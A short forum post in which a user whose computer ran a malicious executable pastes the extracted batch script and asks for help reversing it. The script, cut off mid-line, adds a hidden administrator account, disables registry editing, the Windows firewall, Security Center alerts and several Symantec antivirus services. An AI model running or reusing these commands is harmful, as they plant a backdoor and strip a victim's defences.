Batch File Reverse

M4Assault

Beta member
Messages
1
Hey guys, somone sent me this .exe file and it opened a batch file, i used a program to extract the batch file, and this is what it has come up with

net users /add "Username" "Password"
net localgroup Administrators /add "Username"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Username" /t REG_DWORD /d 00000000 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer" /v NoViewContextMenu /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
net stop wscsvc

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f

net stop sbservice

net stop "Symantec Core LC"

net stop "ccEvtMgr"

net stop "ccPwdSvc"

net stop "Speed Disk Service"

net stop "NPFMntor"

net stop "NSCService"

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\navapsvc" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\GhostStartService" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NProtectService" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVScan" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SBService" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Symantec Core LC" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ccEvtMgr" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ccPwdSvc" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S


What do i do to reverse it? It has disabled reg editing aswell :( can somone help me write a reverse? Thnx :D
 
Back
Top Bottom